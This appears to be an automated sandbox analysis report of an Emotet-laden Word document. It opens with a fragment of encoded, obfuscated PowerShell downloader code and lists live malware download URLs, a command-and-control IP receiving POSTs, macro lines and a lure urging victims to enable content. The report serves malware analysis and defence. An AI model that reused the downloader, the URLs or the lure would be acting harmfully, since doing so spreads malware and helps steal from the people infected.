AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkAbgBjACcAKwAnAGwAJwArACcAdQAnACkAKwAoACcAZABlAHMAJwArACcALwBKAEQAOAAnACsAJwAvAEAAXQAnACkAKwAoACcAYQBuACcAKwAnAHcAJwApA

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: https://brettshawmagic.com/content/Y/Avira URL Cloud: Label: malware
                      Source: http://hangarlastik.com/cgi-bin/Ui4n/Avira URL Cloud: Label: malware
                      Source: https://cafecentral.vincoorbisdev.com/wp-admin/VZX9BU/Avira URL Cloud: Label: malware
                      Source: http://sarture.com/wp-includes/JD8/Avira URL Cloud: Label: malware
                      Source: http://seo.udaipurkart.com/rx-5700-6hnr7/Sgms/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: hangarlastik.comVirustotal: Detection: 6%Perma Link
                      Source: seo.udaipurkart.comVirustotal: Detection: 6%Perma Link
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Bestand.docVirustotal: Detection: 61%Perma Link
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,7_2_100011C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,7_2_100021F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,7_2_10002730
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_006F75AE CryptDecodeObjectEx,19_2_006F75AE
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                      Source: Binary string: ws\System.pdbpdbtem.pdb\B source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.pdbE source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: ws\dll\System.pdb source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: <ystem.pdbD source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.pdblogwW source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbrac source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2094801534.0000000002780000.00000002.00000001.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_006F109C FindFirstFileW,19_2_006F109C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: global trafficDNS query: name: hangarlastik.com
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 89.252.164.58:80
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 89.252.164.58:80

                      Networking:

                      barindex
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmpString found in memory: http://hangarlastik.com/cgi-bin/Ui4n/
                      Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmpString found in memory: http://padreescapes.com/blog/0I/
                      Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmpString found in memory: http://sarture.com/wp-includes/JD8/
                      Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmpString found in memory: http://seo.udaipurkart.com/rx-5700-6hnr7/Sgms/
                      Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmpString found in memory: http://phuongapple.com/messenger-sound-8kwkq/YFr7/
                      Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmpString found in memory: https://brettshawmagic.com/content/Y/
                      Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmpString found in memory: https://cafecentral.vincoorbisdev.com/wp-admin/VZX9BU/
                      Source: global trafficHTTP traffic detected: GET /cgi-bin/Ui4n/ HTTP/1.1Host: hangarlastik.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: hangarlastik.com
                      Source: global trafficHTTP traffic detected: GET /blog/0I/ HTTP/1.1Host: padreescapes.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-includes/JD8/ HTTP/1.1Host: sarture.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /rx-5700-6hnr7/Sgms/ HTTP/1.1Host: seo.udaipurkart.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 5.2.136.90 5.2.136.90
                      Source: Joe Sandbox ViewASN Name: NETINTERNETNetinternetBilisimTeknolojileriASTR NETINTERNETNetinternetBilisimTeknolojileriASTR
                      Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                      Source: Joe Sandbox ViewASN Name: RCS-RDS73-75DrStaicoviciRO RCS-RDS73-75DrStaicoviciRO
                      Source: Joe Sandbox ViewASN Name: ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN
                      Source: global trafficHTTP traffic detected: POST /1b05ye92bd1jr3/zyv623ztls/15s4sj3gl56q/ HTTP/1.1DNT: 0Referer: 5.2.136.90/1b05ye92bd1jr3/zyv623ztls/15s4sj3gl56q/Content-Type: multipart/form-data; boundary=------------------kE9SOewkKUR6zpUliEUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 6772Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.2.136.90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_0070023A InternetReadFile,19_2_0070023A
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B0EF2ED-537D-406E-B057-1B1541B1D39D}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /cgi-bin/Ui4n/ HTTP/1.1Host: hangarlastik.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: hangarlastik.com
                      Source: global trafficHTTP traffic detected: GET /blog/0I/ HTTP/1.1Host: padreescapes.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-includes/JD8/ HTTP/1.1Host: sarture.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /rx-5700-6hnr7/Sgms/ HTTP/1.1Host: seo.udaipurkart.comConnection: Keep-Alive
                      Source: rundll32.exe, 00000006.00000002.2097659737.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095270294.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097228304.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2099371824.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2104055243.0000000002010000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: hangarlastik.com
                      Source: unknownHTTP traffic detected: POST /1b05ye92bd1jr3/zyv623ztls/15s4sj3gl56q/ HTTP/1.1DNT: 0Referer: 5.2.136.90/1b05ye92bd1jr3/zyv623ztls/15s4sj3gl56q/Content-Type: multipart/form-data; boundary=------------------kE9SOewkKUR6zpUliEUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 6772Connection: Keep-AliveCache-Control: no-cache
                      Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmpString found in binary or memory: http://hangarlastik.com
                      Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100092974.000000001B9E0000.00000004.00000001.sdmpString found in binary or memory: http://hangarlastik.com/cgi-bin/Ui4n/
                      Source: powershell.exe, 00000005.00000002.2098001005.0000000003B1D000.00000004.00000001.sdmpString found in binary or memory: http://hangarlastik.com/cgi-sys/suspendedpage.cgi
                      Source: powershell.exe, 00000005.00000002.2098001005.0000000003B1D000.00000004.00000001.sdmpString found in binary or memory: http://hangarlastik.comp
                      Source: rundll32.exe, 00000006.00000002.2097659737.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095270294.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097228304.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2099371824.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2104055243.0000000002010000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: rundll32.exe, 00000006.00000002.2097659737.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095270294.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097228304.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2099371824.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2104055243.0000000002010000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: rundll32.exe, 00000006.00000002.2098909375.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095548608.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097503957.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: rundll32.exe, 00000006.00000002.2098909375.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095548608.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097503957.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2098035314.0000000003B3A000.00000004.00000001.sdmpString found in binary or memory: http://padreescapes.com
                      Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmpString found in binary or memory: http://padreescapes.com/blog/0I/
                      Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmpString found in binary or memory: http://phuongapple.com/messenger-sound-8kwkq/YFr7/
                      Source: powershell.exe, 00000005.00000002.2098035314.0000000003B3A000.00000004.00000001.sdmpString found in binary or memory: http://sarture.com
                      Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmpString found in binary or memory: http://sarture.com/wp-includes/JD8/
                      Source: powershell.exe, 00000005.00000002.2094377918.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096621734.00000000028B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099765117.00000000027F0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: powershell.exe, 00000005.00000002.2098035314.0000000003B3A000.00000004.00000001.sdmpString found in binary or memory: http://seo.udaipurkart.com
                      Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmpString found in binary or memory: http://seo.udaipurkart.com/rx-5700-6hnr7/Sgms/
                      Source: rundll32.exe, 00000006.00000002.2098909375.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095548608.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097503957.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: rundll32.exe, 00000006.00000002.2098909375.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095548608.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097503957.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2094377918.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096621734.00000000028B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099765117.00000000027F0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2101892214.00000000027A0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: rundll32.exe, 00000006.00000002.2097659737.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095270294.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097228304.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2099371824.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2104055243.0000000002010000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: rundll32.exe, 00000006.00000002.2098909375.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095548608.0000000002067000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097503957.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: rundll32.exe, 00000006.00000002.2097659737.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095270294.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097228304.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2099371824.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2104055243.0000000002010000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000002.2092843138.0000000000374000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/cclea
                      Source: powershell.exe, 00000005.00000002.2092873286.00000000003C1000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                      Source: rundll32.exe, 0000000D.00000002.2104055243.0000000002010000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmpString found in binary or memory: https://brettshawmagic.com/content/Y/
                      Source: powershell.exe, 00000005.00000002.2097223327.0000000003784000.00000004.00000001.sdmpString found in binary or memory: https://cafecentral.vincoorbisdev.com/wp-admin/VZX9BU/

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2110963948.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2099512002.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2106608092.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2097844811.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2105544671.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2341761700.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2103080686.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2110533046.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2096612439.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2101819334.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2095079967.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2100913831.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2104205195.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 10.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.6f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.6a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.6c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.6a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.7a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.2b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 'age' ' 0' ' i Wo'd
                      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
                      Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 'age' ' 0' ' i Wo'd"' i C i N@m 13 ;a 10
                      Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a S
                      Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a S
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Document contains an embedded VBA macro with suspicious stringsShow sources
                      Source: Bestand.docOLE, VBA macro line: Set eRxrHHEBB = TptSCH.CreateTextFile("MqoMRwwIg:\gqqsLDE\cFTTPq.jfZyU")
                      Source: Bestand.docOLE, VBA macro line: Set UaCEJEERD = bwdNxC.CreateTextFile("tNUBI:\bUxfKyODA\ZyrvC.WCgQpU")
                      Source: Bestand.docOLE, VBA macro line: Set uwCSCCEO = KTDSIL.CreateTextFile("VdGtFIE:\SzlumIC\CndNBJiEG.WAxLRDDC")
                      Source: Bestand.docOLE, VBA macro line: Set NHymnJzG = TiWkS.CreateTextFile("JhEjHJH:\heHcF\xIjwBCI.IWEODGR")
